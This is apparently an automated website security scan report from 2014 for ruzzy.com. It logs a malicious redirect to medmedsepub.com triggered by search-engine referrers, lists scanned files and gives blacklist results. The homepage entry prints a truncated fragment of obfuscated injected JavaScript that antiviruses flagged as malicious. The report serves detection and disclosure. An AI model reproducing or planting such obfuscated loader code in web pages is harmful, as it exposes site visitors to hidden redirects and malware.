Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://ruzzy.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: ruzzy.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 16 Sep 2014 15:18:41 GMT Location: http://medmedsepub.com Server: Apache Content-Length: 206 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://ruzzy.com/ | 200 OK Content-Length: 5872 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";el.appendChild(document.createTextNode("q"));el.replaceChild(document.createTextNode("l"),el.childNodes[1]);try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.firstChild.nodeValue+a.toString().substr(0,0);};ar="/aegl =cNbi{ufm >[nhtEo})\"<'v,A?Bp0Trq-.;:w]sCyd(1";ar2="R60c0c-20c12c-32c172c-4c-100c-60c20c8c-48c64c8c76c-144c-4c72c4c-68c-8c48c-48c64c8c96c-48c56c-44c-136c8c20c-28c52c-48c184c-84c-72c52c100c-4c-76c-12c-28c68c36c-76c-52c1 e(s); Antivirus reports:
| ||
http://ruzzy.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Tue, 16 Sep 2014 15:18:42 GMT Location: http://medmedsepub.com Server: Apache Content-Length: 206 Content-Type: text/html; charset=iso-8859-1 | clean |
http://medmedsepub.com/ | HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Date: Tue, 16 Sep 2014 15:19:32 GMT Pragma: no-cache Server: Apache Vary: User-Agent,Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Tue, 16 Sep 2014 15:19:32 GMT Set-Cookie: tu=a85a275cb14a0eccf4a9ba9f02f9f921; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=medmedsepub.com; httponly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_QGiUcehKzK5mjMx4PRlguK0Mjp1+ItJXg9Pw2P8wGoo8HwZw0tnYyPx++bbPKCWFsu0Sab+48p2iglArMj37fg== X-Cache: MISS from 410201 X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://medmedsepub.com//?gtnjs=1/ | 200 OK Content-Length: 22720 Content-Type: text/html | clean |
http://img.sedoparking.com/js/jquery-1.4.2.min.js | 200 OK Content-Length: 52579 Content-Type: application/x-javascript | clean |
http://www.google.com/adsense/domains/caf.js | 200 OK Content-Length: 258 Content-Type: text/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ruzzy.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ruzzy.com/
Result: ruzzy.com is not infected or malware details are not published yet.
Result: ruzzy.com is not infected or malware details are not published yet.